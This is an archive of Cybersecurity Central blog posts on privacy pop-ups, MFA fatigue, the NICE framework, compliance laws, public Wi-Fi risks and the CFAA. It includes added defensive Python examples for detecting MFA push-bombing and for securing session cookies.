Note: MyFitnessPal.com is the website used as an example throughout this blog.

Basically, this pop-up asks users to click “Accept” so the screen will go away.  The question I have is: do you grumble and begrudgingly click “Accept”, or do you review the options and read how the site uses and stores your data?  Have you noticed that some websites have this pop-up and some do not?  Does everyone know why we constantly see these pop-ups?  If you cannot answer these questions, do not worry; I will talk about each of them.


Each site that has a privacy policy with a pop-up screen provides links that users can click on to learn how their information is being used and stored.  On this site users can read about their data rights and options, the terms and conditions of use, and the privacy policy.  There is also a link for users to opt out of certain cookies.  Finally, users can click on the “Accept” button to agree to all cookies. 


Before diving deeper into these pop-ups, it helps to understand why they exist in the first place.  One driver in the United States is the California Consumer Privacy Act (CCPA), signed in 2018 and in effect since January 2020, which requires websites to tell users what information they collect and how they intend to use it (Healey, 2021).


The other major reason is the EU’s General Data Protection Regulation (GDPR), in force since May 2018, which applies to any site that collects the personal data of people in the EU, wherever the site is based. Companies worldwide had to bring their websites into compliance in order to keep serving those users.


Back to our example website, MyFitnessPal.com. What are the options available?  The first option is to read exactly what the data rights and options are.  The Reader’s Digest version is that the site tells users they can opt out of personalized and targeted advertising.  It also gives directions on limiting cookies and other tracking technologies, then on changing device settings for both iOS and Android.  Finally, there are even steps for users to access their data and export it to a file (Data Management, n.d.).


Next, let’s look at their Terms and Conditions of Use.  This page spells out what users can and cannot do with their site.  It is basically a legal disclaimer designed to protect them and their users (MyFitnessPal Terms and Conditions of Use, n.d.).  Every site you go to is going to have this page.  Some sites will make it easier to find than others.


The third and final policy that we have is the Privacy Policy.  This page talks about how the site collects and uses user information.  They also discuss how and to whom they share user information.  Reading further on, they discuss the legal reasons for collecting and sharing user information.  They also include situations where users are asked for consent to information sharing. 


Now, there is one more option available. If you review the above screen shot, there is an option to opt out of specific cookies.  This means users can choose which cookies are accepted, or not.  The options may vary from site to site, and based on user region. 


So, let’s take a further look, shall we?  As you can see, the next screenshot tells users why cookies are used.  Users can either agree to all of them and proceed, or click on “More Information” and choose which cookies they want to accept.

If we click on “More Information,” we find a few options that users can opt in or out of.  As shown in the screenshot below, there are three sets of cookies: “Required Cookies”, “Functional Cookies”, and “Advertising Cookies”.  Notice that users can only opt in or out of the “Functional Cookies” and the “Advertising Cookies”.  The reason is that “Required Cookies” are necessary for the site to function properly; the other two are optional.


UPDATE:  As I am writing this blog, new information has come out regarding these cookie consent notifications.


According to the Bleeping Computer news site, seeing these consent pop-ups may mean users are already being tracked.  The reason they say that is because in some cases, these pop-ups facilitate a “privacy breaching data exchange before the user can opt out” (Toulas, 2022).


Now, you may be asking what our options are.  Well, one option is to stop using the internet entirely.  Before I am written off as insane, I understand this is practically impossible; our lives are so intertwined with the internet that the chance of it happening is next to zero.  But it is still an option.  A second option is to continue with the status quo.  A third option?  Yes, there is a third option: use the Brave browser.  Starting with the upgrade due out this month, version 1.45, Brave will block these consent pop-ups (Toulas, 2022).  Hiding the banner does not by itself opt you out of anything; it is workable because Brave’s Shields already block third-party cookies and trackers by default, so the tracking the banner would have consented to is largely blocked anyway.


Bottom line, when you get to a website with one of these privacy pop-ups, I highly recommend taking some time to read through the policies.  I say that because I want everyone to be informed as to how their information is being collected and used.  Keep in mind that the information these sites collect, and use is your information and you as the owner of that information get to dictate whether a website can not only collect, but also use that information. 


References:


SEP 28, 2022

MFA Fatigue

by James Driscoll

September 28, 2022

The data breach at Uber is just the latest in a long list of data breaches this year. While the tactic used to gain network access is not new, I do not believe it had gotten much press until now. You might be wondering which tactic that is: Multi-Factor Authentication (MFA) fatigue. So, what is MFA fatigue? As we all know, there are different types of MFA: hardware keys, biometrics, authenticator applications, SMS codes, and push notifications. MFA fatigue targets push notifications (Abrams, 2022).


The way this attack works is that the threat actor first obtains an employee’s credentials, by phishing, by buying them on the dark web, or some other way. The threat actor then tries to log in, and the victim gets a push notification. The victim, knowing they are not attempting to log in, does not accept it. Not having gained access, the threat actor keeps attempting to log in, repeatedly and in rapid succession, until the victim gets so tired of the notifications that they finally accept one just to make them stop (Abrams, 2022).


So, what can be done to safeguard against this type of attack? Arctic Wolf, a cybersecurity company, has three recommendations.


1. Educate all users on indicators of an attack:


a. Unexpected MFA push notifications

b. Unknown location of login attempt

c. Receiving communication supposedly from a person in the organization’s IT department asking the user to accept the request

d. Continuous MFA requests in rapid succession over a short period of time


2. Restrict the number of MFA push notifications allowed


3. Disable MFA push notifications and use another form of MFA (Tatar, 2022)
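Indicators 1(b) and 1(d) and the cap in recommendation 2 can all be expressed in a few lines of detection and rate-limiting logic. The following is an added example, not code from the original post or from Arctic Wolf: it runs over a constructed authentication log in an assumed `timestamp user event country` format, flags a burst of pushes with no approval in between, flags a push from a country the user has never logged in from, and, the case that matters most, flags an approval that arrives after such a burst. The window, the thresholds and the per-user country baseline are assumptions to tune against your own identity provider’s logs.

```python
"""Detect MFA push-bombing in auth logs and cap pushes per user (added example;
log format, thresholds and the country baseline are assumptions)."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (assumed format). bob's burst ends with an approval: the bad case.
SAMPLE_LOG = """\
2022-09-15T21:58:02Z alice push_sent US
2022-09-15T21:58:05Z alice push_approved US
2022-09-15T22:10:11Z bob push_sent US
2022-09-15T22:10:20Z bob push_denied US
2022-09-15T22:10:31Z bob push_sent BR
2022-09-15T22:10:44Z bob push_denied BR
2022-09-15T22:10:58Z bob push_sent BR
2022-09-15T22:11:09Z bob push_sent BR
2022-09-15T22:11:21Z bob push_sent BR
2022-09-15T22:11:40Z bob push_approved BR
"""
# Countries each user has successfully logged in from before (assumed baseline).
KNOWN_COUNTRIES = {"alice": {"US"}, "bob": {"US"}}

WINDOW = timedelta(minutes=10)
BURST_THRESHOLD = 3   # pushes inside WINDOW with no approval in between -> alert
PUSH_CAP = 3          # most pushes an IdP should send one user per WINDOW


def parse_log(text):
    """Parse 'timestamp user event country' lines into dicts ordered by time."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, event, country = line.split()
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "user": user, "event": event, "country": country})
    return sorted(events, key=lambda e: e["ts"])


def detect_push_fatigue(events, known_countries, window=WINDOW, threshold=BURST_THRESHOLD):
    """Return (user, kind, detail) alerts for indicators (b) and (d) and for a burst that got approved."""
    alerts = []
    pending = defaultdict(deque)        # user -> timestamps of pushes since the last approval
    burst_flagged, country_flagged = set(), set()
    for e in events:
        user, ts, country = e["user"], e["ts"], e["country"]
        if e["event"] == "push_sent":
            q = pending[user]
            q.append(ts)
            while ts - q[0] > window:   # drop pushes that fell out of the window
                q.popleft()
            usual = known_countries.get(user, set())
            if country not in usual and (user, country) not in country_flagged:
                alerts.append((user, "new_country", f"push for login from {country}, usual {sorted(usual)}"))
                country_flagged.add((user, country))
            if len(q) >= threshold and user not in burst_flagged:
                alerts.append((user, "push_burst", f"{len(q)} pushes in {window} with no approval"))
                burst_flagged.add(user)
        elif e["event"] == "push_approved":
            if user in burst_flagged:   # fatigue worked: treat as a probable compromise
                alerts.append((user, "approved_after_burst", f"approved from {country} at {ts:%H:%M:%S}Z"))
            pending[user].clear()
            burst_flagged.discard(user)
    return alerts


class PushThrottle:
    """Per-user cap on pushes per window: the control behind recommendation 2."""
    def __init__(self, cap=PUSH_CAP, window=WINDOW):
        self.cap, self.window = cap, window
        self._sent = defaultdict(deque)

    def allow(self, user, now):
        """True if a push may be sent now; False means fall back to another factor and alert."""
        q = self._sent[user]
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) >= self.cap:
            return False
        q.append(now)
        return True


def throttle_demo(cap=PUSH_CAP, window=WINDOW):
    """Four pushes 30 s apart for one user, then one 11 min later: the cap kicks in and resets."""
    throttle = PushThrottle(cap, window)
    start = datetime(2022, 9, 15, 22, 0, 0)
    decisions = [throttle.allow("bob", start + timedelta(seconds=30 * i)) for i in range(4)]
    decisions.append(throttle.allow("bob", start + timedelta(minutes=11)))
    return decisions


if __name__ == "__main__":
    for alert in detect_push_fatigue(parse_log(SAMPLE_LOG), KNOWN_COUNTRIES):
        print(*alert)
    print("throttle decisions:", throttle_demo())
```

On the sample, alice produces nothing and bob produces three alerts in order: a push from a new country, a burst of three pushes, and then the approval that followed the burst. The throttle refuses the fourth push inside the window and allows one again once the window has passed; when it refuses, the login should fall back to a different factor and the security team should be told. Where the provider supports number matching (the user must type a number shown on the login screen into the authenticator), enable it, since a blind “Approve” tap then no longer completes a login the user did not start.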


One thing to keep in mind is that MFA is another tool in the cybersecurity toolbox. It is subject to compromise just like any other tool we have. I say that because, from what I have seen, the expectation is for MFA to be the be-all and end-all of security, and it is not. I am pretty sure that is an unpopular opinion and that is fine. The bare Approve/Deny push prompt is the weak link; where the provider supports number matching (the user must enter a number shown on the login screen), turn it on, because a blind tap can then no longer complete a login the user did not start.


I am pretty sure that some people reading this are wondering, “if MFA can be compromised, then why use it?” This is a valid question. The reason MFA still needs to be used is that it is part of a layered defense. The first layer is a user’s login credentials (username and password). If those are compromised, the second layer (MFA) comes into play and will generally prevent a threat actor from gaining access to an organization’s network.


As I alluded to earlier, MFA is not foolproof, as the attack on Uber and numerous other organizations proved. Let’s be honest: if a threat actor wants to gain access to a network, they are going to find a way in. The whole point of using MFA as part of a layered defense is to make gaining access to our networks so difficult and time consuming that they move on to another target. The military would call this being a “hard target”. By being a hard target, your organization becomes less desirable to attack, and a threat actor will normally move on.


There are two important takeaways I want everyone to gain from this blog:



References

Abrams, L. (2022, September 20). MFA Fatigue: Hackers' New Favorite Tactic in High-Profile Breaches. Retrieved from Bleeping Computer.


Reupert, A., Straussner, S. L., Weimand, B., & Mayberry, D. (2022, March 11). It Takes a Village to Raise a Child: Understanding and Expanding the Concept of the "Village". Retrieved from Frontiers: It Takes a Village to Raise a Child: Understanding and Expanding the Concept of the “Village”


Tatar, S. (2022, September 22). The Growing Risk of MFA Fatigue Attacks. Retrieved from Arctic Wolf: What is MFA Fatigue? | Arctic Wolf


Cybersecurity Awareness All Year Round

by Eula Chua

September 28, 2022

We have a lot coming for you this October for Cybersecurity Awareness Month. To get you prepared for what’s to come, here’s a quick background of what Cybersecurity Awareness Month is about.


In October 2004, Cybersecurity Awareness month was established as a joint initiative by the National Cybersecurity Alliance and the U.S. Department of Homeland Security.


With the continuous rise of confidential data being uploaded online and the rise of current and upcoming cyber threats, this month is about creating awareness to help all types of users stay safe and protected online.


This year's campaign theme is “See Yourself in Cyber.” Technology continues to adapt and improve every day, and this year’s focus is on putting people first in cybersecurity. As developers, administrators, or end users, we all play a part in technology. It’s important to highlight the preventive measures we can take to protect our online privacy and data, in the hope of building a safer cyberspace together. For more information, check out: 

Cybersecurity Awareness Month | CISA


Although we have a whole month dedicated to Cybersecurity Awareness, did you know that there are other days where we can celebrate it all year round? Here are more days that you can add to your calendar:



Are you participating in this year’s Cybersecurity Awareness Month? 


Connect with us on Cybersecurity Central's socials and tell us about it!



SEP 21, 2022

Cybersecurity Workforce Framework - NIST & NICE

by James Driscoll

September 21, 2022

Let's begin with a typical conversation between someone in cybersecurity and someone wanting to break into the industry. New person: “I want to get into cybersecurity, but do not know where to start.” Cybersecurity professional: “What part of cybersecurity do you want to get into?” New person: “I do not know.”


Does this sound familiar? It should because I am willing to bet that most if not all of us have either initiated or been a party to this very type of conversation. How do we respond when a new person says, “I do not know”, when asked what part of Cybersecurity they want to get into? Luckily, NIST has us covered. They created the National Initiative for Cybersecurity Education (NICE) Cybersecurity Workforce Framework.


The NIST NICE Framework, also known as NIST SP 800-181, was created in 2017 to break the cybersecurity field into 52 work roles. It also acts as a foundational reference providing baseline information on the knowledge, skills, and abilities (KSAs) for those roles. It was updated to Rev. 1 in November 2020 (Newhouse, Keith, Scribner, & Witte, 2017).


One thing that I like about this framework is that it is easy to read and logically laid out. As with any other framework, NIST 800-181 is full of acronyms; however, each one is spelled out the first time it is used, which alleviates some confusion for readers. Another aspect I like is that it spells out not only who the audience is but how it will support them. For example, NIST 800-181 is designed for everyone, but for employers it identifies five aspects that help them write a job description for a particular role. It also describes how it supports current and aspiring employees. Finally, it discusses support for educators, trainers, and technology providers (Newhouse, Keith, Scribner, & Witte, 2017).


So, you might be wondering which part of NIST 800-181 to point a new person to when they say they do not know what part of cybersecurity they want to get into. There is a table in Appendix A (section A.3). Specifically, they want to look at the Work Role column, in the middle of the table, and the Role Description column, on the far right (Newhouse, Keith, Scribner, & Witte, 2017). One thing to keep in mind is that while the NICE Framework identifies 52 roles, individual organizations will not necessarily label their positions the same way, which can cause some confusion. The best way I know to resolve it is to compare the role description in the NICE Framework with the job description in the job ad.


In addition to identifying the roles, the NICE Framework breaks each role down into its applicable tasks, knowledge, skills, and abilities (KSAs). This is in Appendix B. I must warn everyone that this table uses a lot of codes to identify the tasks and KSAs; the codes and their definitions are in Appendix A, so expect a lot of going back and forth between the two appendices.


Now, if you remember from earlier, I said that the NICE Framework is designed to be used by everyone, not just people trying to decide on what part of Cybersecurity to get into. For example, organizations can use Appendix A and B when they are creating job advertisements. Also, managers can use those same appendices when deciding on employee training.


So, if there is one NIST Framework that I think everyone must read, it would be NIST 800-181. It has information applicable to everyone. For new people wanting to break into the Cybersecurity industry, it breaks down the industry into 52 roles, which can assist them in deciding what part of Cybersecurity they want to get into. For HR, it has a listing of KSA’s for those specific roles, which will help them in creating accurate job listings for open positions. Finally, for trainers, NIST 800-181 can be used as a resource as they create training programs, courses, seminars, exercises, and challenges as they can be based on role specific tasks and associated KSA’s.


References

Newhouse, W., Keith, S., Scribner, B., & Witte, G. (2017, August). NIST Special Publication 800-181. Retrieved from National Institute of Standards and Technology: https://doi.org/10.6028/NIST.SP.800-181


Staying Safe in the Digital World

by Eula Chua

September 21, 2022

Not many realize it, but the need for cybersecurity has increased in today’s world and will continue to increase as technology progresses.


Earlier this week, I encountered an elderly client who told me that he did not want to give out his email address unless it was absolutely necessary. This led him to share a deepfake AI incident he had heard about, in which another elderly person was lured into believing that the service provider she was communicating with was the “actual” service provider, when in fact it was a scam. She lost thousands of dollars and had little support. It was devastating to hear, but even more devastating to know that incidents like this happen daily without us even knowing.


I decided to pursue the path of cybersecurity early Spring of this year. It has become more and more evident to me how important it is to implement it on every level, from your personal devices and home networks to small-medium sized businesses, large corporations, and industrial control systems, and to create awareness designed differently for each age group.


Like the following quote, “Your internal reality becomes your external reality.” (Unknown), it’s relevant to say that this applies everywhere, even in the cyber world. If the internal systems are flawed or compromised, it might show as a data breach, a business closure, or financial loss.


If you haven't been keeping up with Simply Cyber’s Daily Cyber News Brief every weekday, you are missing out! First of all, the community never has a dull moment; second, there is always something happening in the digital world that we don’t hear about on mainstream news. Technology changes every day. Being informed about what is happening is an effective way to learn how to prevent ourselves from getting compromised.


As we approach Cybersecurity Awareness Month in October, below are some great resources to better prepare ourselves and help protect one another from online incidents:

Cybersecurity Central is proud to be an official 2022 Cybersecurity Awareness Month Champion organization with National Cybersecurity Alliance.


There’s no better time to start than now. Stay safe, stay aware, and stay secure.


SEP 7, 2022

Offline vs. Online Identities

by Eula Chua

September 14, 2022

Did you know you have two identities? Well technically, it’s two parts of your identity. Don’t worry, I didn’t either but it turns out that the identity we normally refer to is only one half of what we have. Many forget that our digital identity counts and is as important as our real-life identity.

Let’s call them: offline and online. So, what’s the difference?

Our offline identity is what we mostly refer to. It is who we are, our real-life personas, and how others know us. This is the identity we use at home, at work, or at school. The offline identity includes personal details of our life that even our friends and family might know, such as our full name, date of birth, age, address, and even our favourite colours.

Our online identity is the digital identity that we carry, which indicates who we are and how we present ourselves. This is our online persona. It can include our usernames, emails, or aliases for our accounts. The moment we are active on the web is the moment our online identity is established, regardless of whether we create an account online or not.

It’s important to keep in mind that both identities should be secured, as each one comes with different risks. Even if one is more secure than the other, the weaker one still poses a risk to it, since both the offline and the online identity can be an entryway or an attack surface.

What preventive measures can we take to protect our offline and online identities?

Awareness is key. Let’s first look into social engineering.

Social engineering attacks are a common way to gain information using social tactics. As we will look into the specifics of social engineering attacks in the future, for this topic, we will focus on shoulder surfing.

Shoulder surfing is a type of social engineering attack where someone casually observes over the shoulder of another person to gain unauthorized access to information. This is a simple technique used to gather sensitive information, such as credentials, or for monetary gain, and it is often committed in office environments.

Check out some practical ways to prevent shoulder surfing:


Additional steps we can take are to avoid using the things in the list below, to help protect our identity:



Now that we know that our identity is split into two parts, let’s make sure we protect both identities as best as we can. Help us spread awareness by sharing our blog with your network!

To learn more about your digital identity, check out the references below.

References:

Digital identity for individuals. (2017). NIST. https://www.nist.gov/itl/applied-cybersecurity/tig/digital-identity-individuals

Gibson, D. (2020). CompTIA Security+: Get Certified Get Ahead SY0-601 Study Guide. YCDA, LLC.

Introduction to Cybersecurity. (2018, January 22). Networking Academy. https://www.netacad.com/courses/cybersecurity/introduction-cybersecurity

Compliance Frameworks

by James Driscoll

September 14, 2022

While studying for my CompTIA CySA+ examination I came across several regulatory frameworks. So, I thought it would be a good idea to create a blog to briefly discuss each one. The regulatory frameworks that I came across include the Health Insurance Portability and Accountability Act (HIPAA); the Payment Card Industry Data Security Standard (PCI DSS); the Gramm-Leach-Bliley Act (GLBA); the Sarbanes-Oxley (SOX) Act; and finally, the Family Educational Rights and Privacy Act (FERPA).

The first framework I will cover is HIPAA. HIPAA became law back in 1996 and was designed to let employees who change jobs take their insurance with them. It was also designed to make health care delivery more efficient (HIPAA History, n.d.). The heart of HIPAA lies in the security and privacy rules that all healthcare providers, insurance companies, and health information clearinghouses must comply with (Chapple & Seidl, 2017).

The second framework is PCI DSS. The interesting aspect about this standard is that unlike all the others, it is not a law, but rather a collaborative agreement among the major credit card companies (Chapple & Seidl, 2017). This agreement was established in 2004. Now, even though it is not a law, non-compliance still has consequences. These consequences range from simple fines levied by the banks themselves all the way to an organization not being able to take payment cards as a form of payment (Petree, 2019).

The third framework is the GLBA. This standard is applicable to the banking industry. The basic premise is that all financial institutions have a security program and someone to run it (Chapple & Seidl, 2017). It became law back in 1999. This act also mandates that these same organizations communicate how they share and protect customer information (Gramm-Leach-Bliley Act, n.d.).

The fourth framework is the SOX Act. This act applies to any organization that is publicly traded (Chapple & Seidl, 2017). It became law in 2002 in response to numerous financial scandals and was established to thwart these same organizations from defrauding their investors. It is named for the two members of Congress who sponsored it, Senator Paul S. Sarbanes and Representative Michael G. Oxley (Kenton, 2022).

The last framework to be covered is FERPA. This act mandates that educational institutions protect student information (Chapple & Seidl, 2017). FERPA became law back in 1974 and has a dual purpose: 1) it returns control of educational records to the parents or to adult students, and 2) it requires written consent from parents or adult students before an educational institution can release Personally Identifiable Information (PII) that is within those records (Family Educational Rights and Privacy Act (FERPA), n.d.).

References:

Chapple, M., & Seidl, D. (2017). CompTIA CySA+ Study Guide. Sybex.

Family Educational Rights and Privacy Act (FERPA). (n.d.). Retrieved from Centers for Disease Control and Prevention: https://www.cdc.gov/phlp/publications/topic/ferpa.html

Gramm-Leach-Bliley Act. (n.d.). Retrieved from Federal Trade Commission: https://www.ftc.gov/business-guidance/privacy-security/gramm-leach-bliley-act

HIPAA History. (n.d.). Retrieved from HIPAA Journal: https://www.hipaajournal.com/hipaa-history/

Kenton, W. (2022, May 08). Sarbanes-Oxley (SOX) Act of 2002. Retrieved from Investopedia: https://www.investopedia.com/terms/s/sarbanesoxleyact.asp

Petree, S. (2019, January 4). Five Risks for PCI DSS Non-Compliance. Retrieved from Plante Moran: https://www.plantemoran.com/explore-our-thinking/insight/2017/08/five-risks-for-pci-dss-non-compliance#:~:text=%20Five%20risks%20for%20PCI%20DSS%20non-compliance%20,can%20place%20restrictions%20on%20organizations%20such...%20More%20

SEP 7, 2022

What's Happening in Tech & InfoSec? How To Stay (Somewhat) Up-to-Date with Podcasts

by Kimberly McKnight

September 9, 2022

One of the reasons I've made so many connections is tuning into livestreams, attending webinars, and listening to podcasts, then reaching out to those who inspire me and making a personal connection.  It's also how I am able to (somewhat) stay up-to-date on infosec news and events. 


For today's blog, I wanted to cover podcasts. This is the next section to be built out on the resources page, but to align with the resources already on our site, I want to provide you with the foundations.  One topic that isn't highlighted yet on the CC Resources page is podcasts.  Podcasts are critical to staying current on what's happening in the worlds of tech and cyber. 


Below are some of what I feel are must listen podcasts.  Some are daily, others weekly, or even monthly.  How do I find time to listen and keep up?  Full transparency, I don't get to keep up with all of them all the time, but I definitely find time to listen in the morning, a little during the day, a lot at night, and even small doses on the weekends.  I enjoy mixing podcasts that aren't all technical and also include the human side of things:   



Please note: The podcast list above is a only a quick snapshot.  There are many more I've listened to and recommend, and will include in the CC Resources page in the future, as well.  


One of the primary reasons I named this nonprofit foundation Cybersecurity Central was because I want it to be a resource to those whose desire is to learn more about where to learn more about all things cybersecurity.  Cybersecurity Central has a newly released resources page, but there are many topics still to be added from the lists I've accumulated over the past 2 years, researching and discovering where some of the most applicable, engaging, and trustworthy resources are.  Feel free to check out the CC Resources page for a flavor of the absolute essentials everyone should check out.  Be sure to bookmark and check back regularly for new resources.  I have TONS of resources still to share, but building it out one by one is super tedious, bear with me. ;)

 

If you haven't already, be sure to check out Cybersecurity Central’s YouTube channel.

 

And while you are there, please subscribe, like, and share with your network if you found some value. Take care and thanks as always for the continued support for Cybersecurity Central!


Common Attacks on Public Wi-Fi

by Eula Chua

September 7, 2022

From an end user’s perspective, it can be exciting when we find that free Wi-Fi is available. Unfortunately, “free” does not always mean it’s safe to use. In today’s blog, we will build on last week’s blog topic, Public Wi-Fi is Not Your Friend, and highlight some of the risks of using public Wi-Fi.


Although there are many risks that can occur, we will focus on the following three common attacks:



Identity Theft

We often use our identity to verify who we truly are in order to open or access important accounts like our bank accounts. It is crucial that we keep our personal information safe and protected to prevent others from stealing it. This is what identity theft is: when someone steals your personal information such as your name, address, credit card information, social security number, health insurance number, and more. Those who attempt to steal this sensitive information often use it to commit identity fraud for financial gain. To prevent identity theft from occurring, especially on public Wi-Fi, avoid visiting websites where you’re required to fill in your personal information or bank login credentials.


On-Path Attack/Man-In-The-Middle Attack

With an open connection, there can be an influx of network packets traveling within that network, all coming from different devices. This is susceptible to an on-path attack, where a different, and possibly malicious, computer intercepts the connection between two other computers within the same network. This is a form of active eavesdropping. Be aware that any unusual activity, such as large amounts of data being transferred over public Wi-Fi, may indicate an on-path attack. For prevention, it is recommended that devices be equipped with anti-malware software, firewalls, and intrusion detection systems. As with any device, ensure that strong passwords are always used and that software is regularly patched and updated.


Session Hijacking

Session hijacking is similar to the on-path attack. The goal is to either steal personal information, execute a denial-of-service attack, or infect a system with malware. Rather than intercepting traffic between two computers, the malicious hacker intercepts the connection between your computer and a website’s server by recording your session ID. Session IDs may be attached to links or requests that are sent to the websites you visit. Session hijacking attacks come in three types, active, passive, and hybrid, each conducted with different techniques. To prevent this, avoid clicking links you’re unsure about, make sure to log out of your accounts at the end of each session to terminate it, install a firewall and anti-virus software on your device, ensure that the websites you visit are secured, with URLs beginning with “HTTPS”, and last but not least, use a VPN (virtual private network). Using a VPN will make it more difficult for hackers to intercept traffic.
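Two of the defences named above, serving the session ID only over HTTPS and terminating the session on logout, live on the server side. The following is an added example, not code from the original post or from Cybersecurity Central, showing what they look like there. It assumes a hypothetical in-memory `SessionStore` and a `session_cookie_header` helper (both names are this example's own): the session ID is generated from a cryptographic random source so it cannot be guessed, it is sent in a cookie marked `Secure` and `HttpOnly` so it never travels over plaintext HTTP and cannot be read by page scripts, and logging out deletes the session server-side so a copy of the ID captured on the network stops working.

```python
import secrets
import time
from http.cookies import SimpleCookie

# Idle timeout for a session; a constructed value for this example.
SESSION_TTL_SECONDS = 30 * 60


class SessionStore:
    """In-memory server-side session table (hypothetical; real apps use a DB)."""

    def __init__(self):
        self._sessions = {}  # session_id -> {"user": str, "expires": float}

    def create(self, user, now=None):
        now = time.time() if now is None else now
        # 32 random bytes: a session ID an attacker cannot guess or enumerate.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "expires": now + SESSION_TTL_SECONDS}
        return sid

    def lookup(self, sid, now=None):
        """Return the user for a live session, or None if unknown or expired."""
        now = time.time() if now is None else now
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        if entry["expires"] < now:
            del self._sessions[sid]  # expired: discard it rather than honour it
            return None
        entry["expires"] = now + SESSION_TTL_SECONDS  # sliding expiry on use
        return entry["user"]

    def logout(self, sid):
        """Deleting the server-side record is what actually terminates the
        session; a captured copy of the ID is useless afterwards."""
        return self._sessions.pop(sid, None) is not None


def session_cookie_header(sid):
    """Value of the Set-Cookie header that carries the session ID."""
    cookie = SimpleCookie()
    cookie["session"] = sid
    cookie["session"]["secure"] = True     # only sent over HTTPS, never plaintext
    cookie["session"]["httponly"] = True   # not readable by page scripts
    cookie["session"]["samesite"] = "Lax"  # not attached to cross-site requests
    cookie["session"]["path"] = "/"
    return cookie["session"].OutputString()


def logout_demo():
    """Issue -> use -> logout with a fixed clock; returns (header, before, after)."""
    store = SessionStore()
    sid = store.create("alice", now=1000.0)
    header = session_cookie_header(sid)
    user_before = store.lookup(sid, now=1001.0)   # "alice"
    store.logout(sid)
    user_after = store.lookup(sid, now=1002.0)    # None: the ID no longer works
    return header, user_before, user_after


def ttl_demo():
    """Show that an idle session dies on its own; returns (before, after)."""
    store = SessionStore()
    sid = store.create("bob", now=0.0)
    before = store.lookup(sid, now=10.0)                          # "bob"
    after = store.lookup(sid, now=10.0 + SESSION_TTL_SECONDS + 1)  # None
    return before, after


if __name__ == "__main__":
    print(logout_demo())
    print(ttl_demo())
```

The idle timeout is a second line of defence the post does not mention explicitly: a user who forgets to log out on a shared or public network still has the session closed for them after a period of inactivity.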


In Conclusion


There are many other threats out there that need to be covered, but we will need to take things one step at a time. The more devices we hold, the more points of entry we have open. Cybersecurity attacks and breaches happen quite frequently, and the scary part is that we might not even know it’s happening until it reaches the news. Prevention is one of the best ways to protect ourselves and our systems from any attack. We can’t know how to prevent an attack unless we know what we are preventing. This is why cybersecurity awareness is crucial to all users. We hope that we can continue to bring you more cybersecurity awareness content here at Cybersecurity Central to help you stay protected online.


AUG 31, 2022

The Computer Fraud and Abuse Act (CFAA)

by James Driscoll

August 31, 2022

We see news stories almost daily of threat actors hacking into an organization's computer network and either taking the data or encrypting it unless said organization pays a ransom.  Now, we all know that this is illegal, but do we know why it is illegal?  The answer lies within 18 U.S. Code 1030, also known as the Computer Fraud and Abuse Act (CFAA), which became law in 1986.  This blog will discuss the specifics of the CFAA, what led to its passing, and its most recent updates.


History of CFAA

The CFAA got its start as part of another statute called the Comprehensive Crime Act of 1984.  There was a part of this act that made the following two activities related to computers illegal.  1) Gaining unauthorized access to a computer.  2) Having access to a computer but accessing areas that are not authorized (CFAA Background, 2022).  Basically, this is privilege escalation.  


Now for someone to be charged under the Comprehensive Crime Act because of hacking, the victims were limited to government interests.  More specifically the actions had to involve one of three scenarios.  1) Accessing information vital to national security.  2) Gaining access to personal financial records.  3) Gaining unauthorized access to government computers (CFAA Background, 2022).  


Let's skip ahead to 1986.  This is when the provisions of the Comprehensive Crime Act of 1984 related to computer crime officially became 18 U.S. Code 1030, The Computer Fraud and Abuse Act (CFAA).  This separation facilitated the addition of three more prohibitions: 


Now, in addition to what was mentioned above, let's see what else is in the CFAA.  There are also punishments defined in this document.  These punishments are defined by the type of offense.  In addition, the CFAA dictates who (depending on the offense) will investigate.  It will either be the Federal Bureau of Investigation (FBI) or the United States Secret Service.  Finally, it defines certain terms at the end of the document (18 U.S. Code 1030 - Fraud and Related Activity in Connection with Computers, n.d.).


2022 Update

Over the years, the CFAA has been updated numerous times.  The most recent update was in May 2022.  Basically, what this update affirms is that “good-faith security research should not be charged” (Department of Justice Announces New Policy for Charging Cases under Computer Fraud and Abuse Act, 2022).  This update goes on to define good-faith security research, but essentially it means hacking into a network (with the owner’s permission) to test for vulnerabilities so they can be mitigated, thus protecting the CIA Triad of that network (Department of Justice Announces New Policy for Charging Cases under Computer Fraud and Abuse Act, 2022).


Conclusion

I highly recommend at least scanning over it.  I think it is an interesting read, of course I am a bit of a nerd so I may be a little biased.  Nonetheless, it is important to be at least familiar with applicable laws, especially if anyone is wanting to get into penetration testing.  This way you will have an idea of how far you can go without breaking the law, because I will tell you as someone with a criminal justice degree, claiming ignorance of the law is not a defense.


References:

18 U.S. Code 1030 - Fraud and Related Activity in Connection with Computers. (n.d.). Retrieved from cornell.edu: https://www.law.cornell.edu/uscode/text/18/1030 

CFAA Background. (2022, July 14). Retrieved from NACDL: https://www.nacdl.org/Content/CFAABackground 

Department of Justice Announces New Policy for Charging Cases under Computer Fraud and Abuse Act. (2022, May 19). Retrieved from Justice.gov: https://www.justice.gov/opa/pr/department-justice-announces-new-policy-charging-cases-under-computer-fraud-and-abuse-act


Public Wi-Fi is Not Your Friend

by Eula Chua

August 31, 2022

I have been deceived and probably, so have you.

There was a time in life when my friends and I would get excited when Wi-Fi became publicly accessible in certain coffee shops, restaurants, airports, and libraries. This meant that we didn’t have to spend extra money to pay for cellular data overages.

We would instantly connect wherever public Wi-Fi was available as if we had hit the jackpot. Okay, maybe that’s a little exaggerated. But it defined the quote, “the best things in life are free.”

That quote does not exactly hold true, though. It should have been, “the free things in life come with consequences.” Here is where convenience versus security comes to mind.

Public Wi-Fi is not our friend. Connecting to it puts us at potential risk. At your discretion, you can use it when it comes to desperate measures, but if it’s possible, avoid it at all costs.

I’ll tell you why.

There are probably hundreds of people passing by the same location as you. With these hotspots, any one of those people can connect. This also means any one of them may be a cyber criminal.

Another point to think about is how the public Wi-Fi was configured. Was it properly secured? Are you able to gain access to the network as an admin? Maybe they didn’t change the default settings on their router.

Here are a few risks that may be encountered through using public Wi-Fi:



We will go over each one of these in a future post. But for now, what can we do to protect ourselves and mitigate the risks that we can control?


Here is a list compiled by Get Cyber Safe, a Canadian national public awareness campaign:



Do you have other recommendations, tips, or tricks on how to protect ourselves online? Visit us on social and let us know!


